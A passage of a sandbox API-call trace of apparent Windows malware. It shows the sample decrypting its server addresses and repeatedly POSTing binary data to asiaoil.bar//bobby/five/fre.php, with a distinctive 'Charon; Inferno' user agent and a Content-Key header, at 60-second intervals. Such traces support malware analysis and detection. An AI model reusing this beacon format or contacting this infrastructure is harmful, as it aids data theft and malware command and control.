lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0318.509] GetProcessHeap () returned 0x740000 [0318.509] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cee0 | out: hHeap=0x740000) returned 1 [0318.509] closesocket (s=0x33c) returned 0 [0318.510] GetProcessHeap () returned 0x740000 [0318.510] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0318.510] GetProcessHeap () returned 0x740000 [0318.510] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765898 | out: hHeap=0x740000) returned 1 [0318.510] GetProcessHeap () returned 0x740000 [0318.510] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0318.510] GetProcessHeap () returned 0x740000 [0318.511] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0318.512] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x6e4) returned 0x33c [0318.513] Sleep (dwMilliseconds=0xea60) [0318.515] GetProcessHeap () returned 0x740000 [0318.515] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763ed8 [0318.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.517] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.522] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d7e8) returned 1 [0318.531] GetProcessHeap () returned 0x740000 [0318.531] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0318.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.532] CryptImportKey (in: hProv=0x75d7e8, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0318.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.533] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.535] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.535] GetProcessHeap () returned 0x740000 [0318.535] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0318.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.536] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763ed8, pdwDataLen=0x19fcfc | out: pbData=0x763ed8, pdwDataLen=0x19fcfc) returned 1 [0318.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.538] CryptDestroyKey (hKey=0x74d368) returned 1 [0318.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.539] CryptReleaseContext (hProv=0x75d7e8, dwFlags=0x0) returned 1 [0318.539] GetProcessHeap () returned 0x740000 [0318.539] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765f10 [0318.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.541] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0318.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.542] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0318.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.587] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0318.588] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.588] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0318.588] GetProcessHeap () returned 0x740000 [0318.588] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c020 [0318.588] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0318.588] GetProcessHeap () returned 0x740000 [0318.589] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c020 | out: hHeap=0x740000) returned 1 [0318.589] GetProcessHeap () returned 0x740000 [0318.589] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765f10 | out: hHeap=0x740000) returned 1 [0318.589] GetProcessHeap () returned 0x740000 [0318.589] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763ed8 | out: hHeap=0x740000) returned 1 [0318.589] GetProcessHeap () returned 0x740000 [0318.589] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763f20 [0318.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.590] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.596] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d540) returned 1 [0318.603] GetProcessHeap () returned 0x740000 [0318.603] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0318.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.604] CryptImportKey (in: hProv=0x75d540, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0318.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.605] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.606] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.606] GetProcessHeap () returned 0x740000 [0318.606] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0318.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.607] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763f20, pdwDataLen=0x19fcfc | out: pbData=0x763f20, pdwDataLen=0x19fcfc) returned 1 [0318.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.608] CryptDestroyKey (hKey=0x74d368) returned 1 [0318.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.609] CryptReleaseContext (hProv=0x75d540, dwFlags=0x0) returned 1 [0318.609] GetProcessHeap () returned 0x740000 [0318.609] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0318.609] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.610] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0318.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.611] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0318.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.612] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0318.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.612] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0318.612] GetProcessHeap () returned 0x740000 [0318.613] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf58 [0318.613] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0318.614] GetProcessHeap () returned 0x740000 [0318.614] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b4f0 [0318.614] socket (af=2, type=1, protocol=6) returned 0x340 [0318.614] connect (s=0x340, name=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0318.632] FreeAddrInfoW (pAddrInfo=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0318.632] GetProcessHeap () returned 0x740000 [0318.632] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d7e8 [0318.632] GetProcessHeap () returned 0x740000 [0318.632] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0318.633] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0318.634] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0318.634] GetProcessHeap () returned 0x740000 [0318.634] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0318.634] GetProcessHeap () returned 0x740000 [0318.635] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0318.635] GetProcessHeap () returned 0x740000 [0318.635] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763740 [0318.635] GetProcessHeap () returned 0x740000 [0318.635] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0318.635] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0318.636] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0318.636] GetProcessHeap () returned 0x740000 [0318.636] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0318.636] GetProcessHeap () returned 0x740000 [0318.637] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0318.637] send (s=0x340, buf=0x747928*, len=243, flags=0) returned 243 [0318.637] send (s=0x340, buf=0x761fd0*, len=159, flags=0) returned 159 [0318.637] GetProcessHeap () returned 0x740000 [0318.637] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0318.637] recv (in: s=0x340, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 575 [0318.736] GetProcessHeap () returned 0x740000 [0318.737] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0318.737] GetProcessHeap () returned 0x740000 [0318.737] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763740 | out: hHeap=0x740000) returned 1 [0318.737] GetProcessHeap () returned 0x740000 [0318.737] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0318.737] GetProcessHeap () returned 0x740000 [0318.738] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d7e8 | out: hHeap=0x740000) returned 1 [0318.738] closesocket (s=0x340) returned 0 [0318.738] GetProcessHeap () returned 0x740000 [0318.738] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4f0 | out: hHeap=0x740000) returned 1 [0318.738] GetProcessHeap () returned 0x740000 [0318.739] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0318.739] GetProcessHeap () returned 0x740000 [0318.739] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763f20 | out: hHeap=0x740000) returned 1 [0318.739] GetProcessHeap () returned 0x740000 [0318.739] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf58 | out: hHeap=0x740000) returned 1 [0318.740] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x164) returned 0x340 [0318.741] Sleep (dwMilliseconds=0xea60) [0318.743] GetProcessHeap () returned 0x740000 [0318.743] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763860 [0318.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.744] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.752] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d298) returned 1 [0318.760] GetProcessHeap () returned 0x740000 [0318.760] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0318.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.761] CryptImportKey (in: hProv=0x75d298, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0318.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.762] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.763] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.763] GetProcessHeap () returned 0x740000 [0318.764] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0318.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.765] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763860, pdwDataLen=0x19fcfc | out: pbData=0x763860, pdwDataLen=0x19fcfc) returned 1 [0318.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.767] CryptDestroyKey (hKey=0x74d768) returned 1 [0318.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.768] CryptReleaseContext (hProv=0x75d298, dwFlags=0x0) returned 1 [0318.768] GetProcessHeap () returned 0x740000 [0318.768] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x7669d8 [0318.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.769] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0318.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.770] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0318.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.771] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0318.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.812] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0318.812] GetProcessHeap () returned 0x740000 [0318.812] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bfa8 [0318.812] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0318.812] GetProcessHeap () returned 0x740000 [0318.812] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bfa8 | out: hHeap=0x740000) returned 1 [0318.813] GetProcessHeap () returned 0x740000 [0318.813] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7669d8 | out: hHeap=0x740000) returned 1 [0318.813] GetProcessHeap () returned 0x740000 [0318.813] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763860 | out: hHeap=0x740000) returned 1 [0318.813] GetProcessHeap () returned 0x740000 [0318.813] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763f20 [0318.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.815] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.821] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cc38) returned 1 [0318.828] GetProcessHeap () returned 0x740000 [0318.828] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0318.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.829] CryptImportKey (in: hProv=0x75cc38, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0318.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.830] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.831] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.831] GetProcessHeap () returned 0x740000 [0318.832] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0318.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.833] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763f20, pdwDataLen=0x19fcfc | out: pbData=0x763f20, pdwDataLen=0x19fcfc) returned 1 [0318.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.834] CryptDestroyKey (hKey=0x74d368) returned 1 [0318.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.835] CryptReleaseContext (hProv=0x75cc38, dwFlags=0x0) returned 1 [0318.835] GetProcessHeap () returned 0x740000 [0318.835] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765670 [0318.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.836] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0318.837] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.837] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0318.838] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.838] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0318.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.839] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0318.839] GetProcessHeap () returned 0x740000 [0318.839] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0318.839] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bf80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2e0*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0318.841] GetProcessHeap () returned 0x740000 [0318.841] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b600 [0318.841] socket (af=2, type=1, protocol=6) returned 0x344 [0318.841] connect (s=0x344, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0318.863] FreeAddrInfoW (pAddrInfo=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bf80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2e0*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0318.863] GetProcessHeap () returned 0x740000 [0318.863] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cf68 [0318.863] GetProcessHeap () returned 0x740000 [0318.863] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0318.864] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0318.865] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0318.865] GetProcessHeap () returned 0x740000 [0318.865] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0318.865] GetProcessHeap () returned 0x740000 [0318.865] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0318.865] GetProcessHeap () returned 0x740000 [0318.865] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x7639c8 [0318.865] GetProcessHeap () returned 0x740000 [0318.865] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0318.866] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0318.867] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0318.867] GetProcessHeap () returned 0x740000 [0318.867] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0318.867] GetProcessHeap () returned 0x740000 [0318.867] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0318.867] send (s=0x344, buf=0x747928*, len=243, flags=0) returned 243 [0318.868] send (s=0x344, buf=0x761fd0*, len=159, flags=0) returned 159 [0318.868] GetProcessHeap () returned 0x740000 [0318.868] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0318.868] recv (in: s=0x344, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 573 [0318.963] GetProcessHeap () returned 0x740000 [0318.963] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0318.964] GetProcessHeap () returned 0x740000 [0318.964] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7639c8 | out: hHeap=0x740000) returned 1 [0318.964] GetProcessHeap () returned 0x740000 [0318.964] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0318.964] GetProcessHeap () returned 0x740000 [0318.965] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cf68 | out: hHeap=0x740000) returned 1 [0318.965] closesocket (s=0x344) returned 0 [0318.965] GetProcessHeap () returned 0x740000 [0318.965] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b600 | out: hHeap=0x740000) returned 1 [0318.965] GetProcessHeap () returned 0x740000 [0318.966] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765670 | out: hHeap=0x740000) returned 1 [0318.966] GetProcessHeap () returned 0x740000 [0318.966] 